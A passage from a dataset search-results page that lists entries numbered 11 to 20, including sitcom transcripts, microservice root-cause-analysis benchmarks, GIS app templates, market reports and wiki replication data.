      Resource Description: MS Excel worksheet that includes raw responses from the administered survey, as downloaded unfiltered from Survey Monkey, including incomplete responses. Also includes additional classification and calculations to support analysis. Individual email addresses and IP addresses have been removed.
      Resource Software Recommended: Microsoft Excel, url: https://products.office.com/en-us/excel
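    The per-person storage rule described above is simple enough to state directly in code; an illustrative helper (the function and parameter names are invented for illustration, not the survey's):

    ```python
    # Illustrative helper for the per-person storage estimate described above:
    # high end of the reported range, divided by 1 for an individual response
    # or by G, the number of individuals in a group response.
    def per_person_storage_tb(range_high_tb: float, group_size: int = 1) -> float:
        """Estimated storage need per scientist, in terabytes."""
        return range_high_tb / group_size

    # A group of 5 scientists jointly reporting the "10 to 100 TB" range:
    print(per_person_storage_tb(100, group_size=5))  # 20.0 TB per person
    ```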

  11. The Big Bang Theory dataset

    • kaggle.com
    Updated Mar 18, 2020
    Cite
    shilpibhattacharyya (2020). The Big Bang Theory dataset [Dataset]. https://www.kaggle.com/datasets/shilpibhattacharyya/the-big-bang-theory-dataset
    Available download formats: Croissant (a machine-learning dataset format; learn more at mlcommons.org/croissant)
    Dataset updated
    Mar 18, 2020
    Dataset provided by
    Kaggle (http://kaggle.com/)
    Authors
    shilpibhattacharyya
    Description

    Context

    There's a story behind every dataset and here's your opportunity to share yours.

    Content

    What's inside is more than just rows and columns. Make it easy for others to get started by describing how you acquired the data and what time period it represents, too.

    This dataset was created from online transcripts of the sitcom.

    Acknowledgements

    We wouldn't be here without the help of others. If you owe any attributions or thanks, include them here along with any citations of past research.

    Inspiration

    Your data will be in front of the world's largest data science community. What questions do you want to see answered?

  12. Real estate data scraping - get property data from any website on the...

    • datarade.ai
    Updated Apr 17, 2023
    Cite
    ScrapeLabs (2023). Real estate data scraping - get property data from any website on the Internet | scrapelabs.io [Dataset]. https://datarade.ai/data-products/real-estate-data-scraping-get-property-data-from-any-websit-scrapelabs
    Available download formats: .bin, .json, .xml, .csv, .xls, .sql, .txt
    Dataset updated
    Apr 17, 2023
    Dataset authored and provided by
    ScrapeLabs
    Area covered
    Korea (Democratic People's Republic of), Guinea-Bissau, Guadeloupe, Saint Vincent and the Grenadines, Romania, Hong Kong, French Polynesia, Morocco, Puerto Rico, Canada
    Description

    We create tailor-made solutions for every customer, so there are no limits to how we can customize your scraper. You don't have to worry about buying and maintaining complex and expensive software, or hiring developers.

    You can get the data on a one-time or recurring (based on your needs) basis.

    Get the data in any format and to any destination you need: Excel, CSV, JSON, XML, S3, GCP, or any other.

  13. Dataset Artifact for paper "Root Cause Analysis for Microservice System...

    • data.niaid.nih.gov
    • zenodo.org
    Updated Aug 25, 2024
    Cite
    Ha, Huong (2024). Dataset Artifact for paper "Root Cause Analysis for Microservice System based on Causal Inference: How Far Are We?" [Dataset]. https://data.niaid.nih.gov/resources?id=zenodo_13305662
    Dataset updated
    Aug 25, 2024
    Dataset provided by
    Pham, Luan
    Zhang, Hongyu
    Ha, Huong
    License

    Attribution 4.0 (CC BY 4.0): https://creativecommons.org/licenses/by/4.0/
    License information was derived automatically

    Description

    Artifacts for the paper titled "Root Cause Analysis for Microservice System based on Causal Inference: How Far Are We?".

    This artifact repository contains 9 compressed folders, as follows:

    ID   File Name             Description
    1    syn_circa.zip         CIRCA10 and CIRCA50 datasets for Causal Discovery
    2    syn_rcd.zip           RCD10 and RCD50 datasets for Causal Discovery
    3    syn_causil.zip        CausIL10 and CausIL50 datasets for Causal Discovery
    4    rca_circa.zip         CIRCA10 and CIRCA50 datasets for RCA
    5    rca_rcd.zip           RCD10 and RCD50 datasets for RCA
    6    online-boutique.zip   Online Boutique dataset for RCA
    7    sock-shop-1.zip       Sock Shop 1 dataset for RCA
    8    sock-shop-2.zip       Sock Shop 2 dataset for RCA
    9    train-ticket.zip      Train Ticket dataset for RCA

    Each zip file contains the generated/collected data from the corresponding data generator or microservice benchmark systems (e.g., online-boutique.zip contains metrics data collected from the Online Boutique system).

    Details about the generation of our datasets

    1. Synthetic datasets

    We use three different synthetic data generators from three previous RCA studies [15, 25, 28] to create the synthetic datasets: the CIRCA, RCD, and CausIL data generators. Their mechanisms are as follows:

    1. The CIRCA data generator [28] generates a random causal directed acyclic graph (DAG) based on a given number of nodes and edges. From this DAG, time series data for each node is generated using a vector auto-regression (VAR) model. A fault is injected into a node by altering the noise term in the VAR model for two timestamps.

    2. The RCD data generator [25] uses the pyAgrum package [3] to generate a random DAG based on a given number of nodes, subsequently generating discrete time series data for each node, with values ranging from 0 to 5. A fault is introduced into a node by changing its conditional probability distribution.

    3. The CausIL data generator [15] generates causal graphs and time series data that simulate the behavior of microservice systems. It first constructs a DAG of services and metrics based on domain knowledge, then generates metric data for each node of the DAG using regressors trained on real metrics data. Unlike the CIRCA and RCD data generators, the CausIL data generator does not have the capability to inject faults.

    To create our synthetic datasets, we first generate 10 DAGs whose nodes range from 10 to 50 for each of the synthetic data generators. Next, we generate fault-free datasets using these DAGs with different seedings, resulting in 100 cases for the CIRCA and RCD generators and 10 cases for the CausIL generator. We then create faulty datasets by introducing ten faults into each DAG and generating the corresponding faulty data, yielding 100 cases for the CIRCA and RCD data generators. The fault-free datasets (e.g., syn_rcd, syn_circa) are used to evaluate causal discovery methods, while the faulty datasets (e.g., rca_rcd, rca_circa) are used to assess RCA methods.
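    For intuition, a minimal sketch of the CIRCA-style mechanism (random DAG, VAR time series, fault via an altered noise term); all sizes and coefficients here are arbitrary choices, not the authors' exact generator:

    ```python
    # Illustrative sketch of CIRCA-style synthetic data generation:
    # random DAG -> VAR time series -> fault injected via the noise term.
    # Sizes and coefficients are arbitrary, not the authors' exact generator.
    import numpy as np

    rng = np.random.default_rng(0)
    n_nodes, n_steps = 10, 1000

    # 1. Random DAG: an upper-triangular adjacency matrix guarantees acyclicity.
    adj = np.triu(rng.random((n_nodes, n_nodes)) < 0.2, k=1)
    weights = adj * rng.uniform(0.2, 0.8, size=adj.shape)

    # 2. VAR-style data: each node depends on its parents' previous values.
    data = np.zeros((n_steps, n_nodes))
    noise_scale = np.ones(n_nodes)
    fault_node, fault_steps = 3, (500, 501)  # fault: altered noise for 2 steps
    for t in range(1, n_steps):
        eps = rng.normal(0, noise_scale, n_nodes)
        if t in fault_steps:
            eps[fault_node] += rng.normal(0, 10.0)  # the altered noise term
        data[t] = data[t - 1] @ weights + eps
    ```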

    2. Data collected from benchmark microservice systems

    We deploy three popular benchmark microservice systems: Sock Shop [6], Online Boutique [4], and Train Ticket [8], on a four-node Kubernetes cluster hosted by AWS. Next, we use the Istio service mesh [2] with Prometheus [5] and cAdvisor [1] to monitor and collect resource-level and service-level metrics of all services, as in previous works [25, 39, 59]. To generate traffic, we use the load generators provided by these systems and customise them to explore all services with 100 to 200 concurrent users. We then introduce five common faults (CPU hog, memory leak, disk IO stress, network delay, and packet loss) into five different services within each system. Finally, we collect metrics data before and after the fault injection operation. An overview of our setup is presented in the figure below (not reproduced in this listing).
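    The five fault types can be reproduced with standard Linux tooling; the sketch below assumes stress-ng and tc/netem are available on the target nodes, with arbitrary example parameters (the authors' exact injection mechanism is not specified here):

    ```python
    # Illustrative fault-injection helpers, assuming stress-ng and tc/netem
    # are installed on the target nodes. Parameters are arbitrary examples.
    import subprocess

    def cpu_hog(seconds: int = 60) -> None:
        """Saturate all CPUs for a while (CPU hog fault)."""
        subprocess.run(["stress-ng", "--cpu", "0", "--timeout", f"{seconds}s"])

    def disk_io_stress(seconds: int = 60) -> None:
        """Generate heavy disk I/O (disk IO stress fault)."""
        subprocess.run(["stress-ng", "--hdd", "2", "--timeout", f"{seconds}s"])

    def network_delay(dev: str = "eth0", delay_ms: int = 200) -> None:
        """Add latency to an interface via tc/netem (network delay fault)."""
        subprocess.run(["tc", "qdisc", "add", "dev", dev, "root",
                        "netem", "delay", f"{delay_ms}ms"])

    def packet_loss(dev: str = "eth0", loss_pct: int = 10) -> None:
        """Drop a fraction of packets via tc/netem (packet loss fault)."""
        subprocess.run(["tc", "qdisc", "add", "dev", dev, "root",
                        "netem", "loss", f"{loss_pct}%"])
    ```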

    Code

    The code to reproduce the experimental results in the paper is available at https://github.com/phamquiluan/RCAEval.

    References

    As in our paper.

  14. GeoForm (Deprecated)

    • noveladata.com
    Updated Jul 2, 2014
    Cite
    esri_en (2014). GeoForm (Deprecated) [Dataset]. https://www.noveladata.com/items/931653256fd24301a84fc77955914a82
    Dataset updated
    Jul 2, 2014
    Dataset provided by
    Esri (http://esri.com/)
    Authors
    esri_en
    Description

    Geoform is a configurable app template for form-based data editing of a Feature Service. This application allows users to enter data through a form instead of a map's pop-up while leveraging the power of the Web Map and editable Feature Services. This app geo-enables data and workflows by lowering the barrier of entry for completing simple tasks.

    Use Cases

    Provides a form-based experience for entering data through a form instead of a map pop-up. This is a good choice for users who find forms a more intuitive format than pop-ups for entering data. Useful to collect new point data from a large audience of non-technical staff or members of the community.

    Configurable Options

    Geoform has an interactive builder used to configure the app in a step-by-step process. Use Geoform to collect new point data and configure it using the following options:

    • Choose a web map and the editable layer(s) to be used for collection.
    • Provide a title, logo image, and form instructions/details.
    • Control and choose what attribute fields will be present in the form. Customize how they appear in the form, the order they appear in, and add hint text.
    • Select from over 15 different layout themes.
    • Choose the display field that will be used for sorting when viewing submitted entries.
    • Enable offline support, social media sharing, default map extent, locate on load, and a basemap toggle button.
    • Choose which locate methods are available in the form, including: current location, search, latitude and longitude, USNG coordinates, MGRS coordinates, and UTM coordinates.

    Supported Devices

    This application is responsively designed to support use in browsers on desktops, mobile phones, and tablets.

    Data Requirements

    This web app includes the capability to edit a hosted feature service or an ArcGIS Server feature service. Creating hosted feature services requires an ArcGIS Online organizational subscription or an ArcGIS Developer account.

    Get Started

    This application can be created in the following ways:

    • Click the Create a Web App button on this page.
    • Share a map and choose to Create a Web App.
    • On the Content page, click Create - App - From Template.

    Click the Download button to access the source code. Do this if you want to host the app on your own server and optionally customize it to add features or change styling.

  15. OpenSolution | Web Hosting & Domain Names | Technology Data

    • datastore.forage.ai
    Updated Sep 22, 2024
    Cite
    (2024). OpenSolution | Web Hosting & Domain Names | Technology Data [Dataset]. https://datastore.forage.ai/searchresults/?resource_keyword=web
    Dataset updated
    Sep 22, 2024
    Description

    OpenSolution is a prominent organization that specializes in creating and offering innovative solutions for webmasters. Their flagship products include the Quick.Cms and Quick.Cart systems, which are designed to provide efficient and easy-to-use content management and e-commerce platforms. With over 32,000 websites running on their software, OpenSolution has established itself as a trusted partner for web development companies.

    The company's software is renowned for its intuitive administration panels, excellent Google results, and standards-compliance. OpenSolution also partners with various companies to create custom websites and offers a range of services to support their partners, including offering partnership opportunities for webmasters.

  16. Online Database Report

    • archivemarketresearch.com
    Updated Feb 18, 2025
    Cite
    Archive Market Research (2025). Online Database Report [Dataset]. https://www.archivemarketresearch.com/reports/online-database-32755
    Available download formats: doc, ppt, pdf
    Dataset updated
    Feb 18, 2025
    Dataset authored and provided by
    Archive Market Research
    License

    https://www.archivemarketresearch.com/privacy-policy

    Time period covered
    2025 - 2033
    Area covered
    Global
    Variables measured
    Market Size
    Description

    The online database market is projected to witness significant growth, with a market size of XXX million in 2025 and a CAGR of XX% during the forecast period from 2025 to 2033. This growth is attributed to the increasing adoption of cloud computing, growing demand for data analytics, and government initiatives to promote digitalization. Cloud-based databases offer scalability, cost-effectiveness, and ease of deployment, making them attractive for businesses of all sizes. Data analytics is essential for businesses to gain insights from their data and make informed decisions. Online databases provide a centralized platform for data storage and management, facilitating efficient data analysis. Governments across the globe are implementing policies to promote digitalization, driving the adoption of online databases in various sectors, including government, healthcare, and education.

    Key trends shaping the market include the rise of big data, the adoption of artificial intelligence (AI) and machine learning (ML), and the increasing importance of data security. Big data refers to the exponential growth of data volume, velocity, and variety. Online databases provide the infrastructure to handle and process vast amounts of data. AI and ML algorithms leverage online databases to learn from data and make predictions, driving innovation in various industries. Data security is of utmost importance given the growing threat of cyberattacks. Online databases implement robust security measures to protect sensitive data, ensuring compliance and building trust among users.

  17. ArcGIS Online Fundamentals

    • hub.arcgis.com
    Updated May 17, 2019
    Cite
    State of Delaware (2019). ArcGIS Online Fundamentals [Dataset]. https://hub.arcgis.com/documents/263e7ee8ae5a4416b3fe0c0bb7e9bd17
    Dataset updated
    May 17, 2019
    Dataset authored and provided by
    State of Delaware
    Description

    Enroll in this plan to understand ArcGIS Online capabilities, publish content to an ArcGIS Online organizational site, create web maps and apps, and review common ArcGIS Online administrative tasks.

    Goals

    • Access web maps, apps, and other GIS resources that have been shared to an ArcGIS Online organizational site.
    • Publish GIS data as services to an ArcGIS Online organizational site.
    • Create, configure, and share web maps and apps.
    • Manage ArcGIS Online user roles and privileges.

  18. Internet of Things - number of connected devices worldwide 2015-2025

    • statista.com
    Updated Nov 27, 2016
    Cite
    Statista (2016). Internet of Things - number of connected devices worldwide 2015-2025 [Dataset]. https://www.statista.com/statistics/471264/iot-number-of-connected-devices-worldwide/
    Dataset updated
    Nov 27, 2016
    Dataset authored and provided by
    Statista (http://statista.com/)
    Area covered
    Worldwide
    Description

    By 2025, forecasts suggest that there will be more than ** billion Internet of Things (IoT) connected devices in use. This would be a nearly threefold increase from the IoT installed base in 2019.

    What is the Internet of Things?

    The IoT refers to a network of devices that are connected to the internet and can "communicate" with each other. Such devices include everyday tech gadgets such as smartphones and wearables, smart home devices such as smart meters, as well as industrial devices like smart machines. These smart connected devices are able to gather, share, and analyze information and create actions accordingly. By 2023, global spending on IoT will reach *** trillion U.S. dollars.

    How does the Internet of Things work?

    IoT devices make use of sensors and processors to collect and analyze data acquired from their environments. The data collected from the sensors is shared by being sent to a gateway or to other IoT devices; it is then either sent to and analyzed in the cloud or analyzed locally. By 2025, the data volume created by IoT connections is projected to reach a massive total of **** zettabytes.

    Privacy and security concerns

    Given the amount of data generated by IoT devices, it is no wonder that data privacy and security are among the major concerns with regard to IoT adoption. Once devices are connected to the Internet, they become vulnerable to possible security breaches in the form of hacking, phishing, etc. Frequent data leaks from social media raise earnest concerns about information security standards in today's world; were the IoT to become the next new reality, serious efforts to create strict security standards need to be prioritized.

  19. Replication Data for: Revisiting 'The Rise and Decline' in a Population of...

    • search.dataone.org
    • dataverse.harvard.edu
    Updated Nov 22, 2023
    Cite
    TeBlunthuis, Nathan; Aaron Shaw; Benjamin Mako Hill (2023). Replication Data for: Revisiting 'The Rise and Decline' in a Population of Peer Production Projects [Dataset]. http://doi.org/10.7910/DVN/SG3LP1
    Explore at:
    Dataset updated
    Nov 22, 2023
    Dataset provided by
    Harvard Dataverse
    Authors
    TeBlunthuis, Nathan; Aaron Shaw; Benjamin Mako Hill
    Description

    This archive contains code and data for reproducing the analysis for “Replication Data for Revisiting ‘The Rise and Decline’ in a Population of Peer Production Projects”. Depending on what you hope to do with the data, you probably do not want to download all of the files, and depending on your computational resources you may not be able to run all stages of the analysis. The code for all stages, including typesetting the manuscript and running the analysis, is in code.tar. If you only want to run the final analysis or to play with the datasets used in the paper, you want intermediate_data.7z or the uncompressed tab and csv files.

    The data files are created in a four-stage process. The first stage uses the program “wikiq” to parse MediaWiki XML dumps and create TSV files with edit data for each wiki. The second stage generates all.edits.RDS, which combines these TSVs into a dataset of edits from all the wikis; this file is expensive to generate and, at 1.5 GB, fairly large. The third stage builds smaller intermediate files containing the analytical variables from these TSV files. The fourth stage uses the intermediate files to generate smaller RDS files that contain the results. Finally, knitr and LaTeX typeset the manuscript. A stage will only run if the outputs from the previous stages do not exist, so if the intermediate files exist they will not be regenerated and only the final analysis will run; the exception is stage 4, fitting models and generating plots, which always runs. If you only want to replicate from the second stage onward, you want wikiq_tsvs.7z. If you want to replicate everything, you want wikia_mediawiki_xml_dumps.7z.001, wikia_mediawiki_xml_dumps.7z.002, and wikia_mediawiki_xml_dumps.7z.003. These instructions work backwards from building the manuscript using knitr, through loading the datasets and running the analysis, to building the intermediate datasets.

    Building the manuscript using knitr. This requires working latex, latexmk, and knitr installations. Depending on your operating system you might install these packages in different ways; on Debian Linux you can run apt install r-cran-knitr latexmk texlive-latex-extra. Alternatively, you can upload the necessary files to a project on Overleaf.com. Download code.tar, which has everything you need to typeset the manuscript, and unpack it (on a Unix system, tar xf code.tar). Navigate to code/paper_source and install the R dependencies: in R, run install.packages(c("data.table","scales","ggplot2","lubridate","texreg")). On a Unix system you should then be able to run make to build the manuscript generalizable_wiki.pdf; otherwise, try uploading all of the files (including the tables, figure, and knitr folders) to a new project on Overleaf.com.

    Loading intermediate datasets. The intermediate datasets are in the intermediate_data.7z archive, which can be extracted on a Unix system with 7z x intermediate_data.7z; the files are 95 MB uncompressed. These are RDS (R data set) files and can be loaded in R using readRDS, for example newcomer.ds <- readRDS("newcomers.RDS"). If you wish to work with these datasets using a tool other than R, you might prefer the .tab files.

    Running the analysis. Fitting the models may not work on machines with less than 32 GB of RAM. If you have trouble, the functions in lib-01-sample-datasets.R can create stratified samples of data for fitting models; see line 89 of 02_model_newcomer_survival.R for an example. Download code.tar and intermediate_data.7z to your working folder and extract both archives (on a Unix system, tar xf code.tar && 7z x intermediate_data.7z). Install the R dependencies: install.packages(c("data.table","ggplot2","urltools","texreg","optimx","lme4","bootstrap","scales","effects","lubridate","devtools","roxygen2")). On a Unix system you can simply run regen.all.sh to fit the models, build the plots, and create the RDS files.

    Generating datasets. Building the intermediate files: these are generated from all.edits.RDS, a process that requires about 20 GB of memory. Download all.edits.RDS, userroles_data.7z, selected.wikis.csv, and code.tar; unpack code.tar and userroles_data.7z (on a Unix system, tar xf code.tar && 7z x userroles_data.7z); install the R dependencies listed above; then run 01_build_datasets.R. Building all.edits.RDS: the intermediate RDS files used in the analysis are created from all.edits.RDS. To replicate building all.edits.RDS, you only need to run 01_build_datasets.R when the int... Visit https://dataone.org/datasets/sha256%3Acfa4980c107154267d8eb6dc0753ed0fde655a73a062c0c2f5af33f237da3437 for complete metadata about this dataset.
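
    The “Loading intermediate datasets” step above condenses to a few lines of R. This is only a sketch of those instructions: it assumes intermediate_data.7z has already been extracted into the working directory, and the .tab file name shown in the comment is a hypothetical counterpart to the newcomers.RDS example given in the description.

        # Sketch of the "Loading intermediate datasets" step described above.
        # Assumes intermediate_data.7z has been extracted into the working dir.
        library(data.table)

        # Example file named in the dataset description:
        newcomer.ds <- readRDS("newcomers.RDS")

        # Non-R tools can use the .tab files instead; data.table's fread()
        # also reads them (file name here is a hypothetical counterpart):
        # newcomer.tab <- fread("newcomers.tab")

        str(newcomer.ds, max.level = 1)  # quick look at the object's structure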

  20. Terms of Use Generator Report

    • datainsightsmarket.com
    doc, pdf, ppt
    Updated May 2, 2025
    Cite
    Data Insights Market (2025). Terms of Use Generator Report [Dataset]. https://www.datainsightsmarket.com/reports/terms-of-use-generator-1963360
    Explore at:
    Available download formats: pdf, doc, ppt
    Dataset updated
    May 2, 2025
    Dataset authored and provided by
    Data Insights Market
    License

    https://www.datainsightsmarket.com/privacy-policy

    Time period covered
    2025 - 2033
    Area covered
    Global
    Variables measured
    Market Size
    Description

    The market for Terms of Use Generators is experiencing robust growth, driven by the increasing need for legally compliant online platforms and applications. The expanding digital landscape, encompassing e-commerce, mobile apps, and SaaS solutions, necessitates readily available and cost-effective tools to create legally sound terms of service. This demand fuels the market's expansion, with a significant number of businesses – from small startups to large enterprises – adopting these generators to streamline their legal compliance processes. The market is segmented by application type (mobile apps, e-commerce, websites, SaaS, etc.) and operating system (Android and iOS), reflecting the diverse needs of different online platforms. The competitive landscape is dynamic, featuring both established players and emerging startups offering varied functionalities and pricing models. While the exact market size is unavailable, considering the strong growth drivers and the increasing digitalization across all sectors, a reasonable estimation places the 2025 market size at approximately $250 million, with a projected Compound Annual Growth Rate (CAGR) of 15% over the forecast period (2025-2033). This growth is likely to be driven by increasing regulatory scrutiny, the simplification of legal complexities offered by these tools, and a rise in user-friendly, intuitive platforms.

    Several factors contribute to the market's continued expansion. The increasing complexity of data privacy regulations (like GDPR and CCPA) compels businesses to seek compliant solutions. The rise of no-code/low-code development platforms also contributes to growth, as these platforms empower non-technical users to create and deploy applications, further increasing the need for readily available Terms of Use generators. Conversely, the market faces challenges such as the potential for inaccuracies in automatically generated terms and the need for ongoing legal review and updates to ensure compliance with evolving regulations. Despite these restraints, the convenience and cost-effectiveness of these generators are likely to outweigh the concerns, leading to sustained market growth in the coming years. Geographic segmentation reveals strong performance across North America and Europe, with emerging markets in Asia Pacific and other regions demonstrating high growth potential.
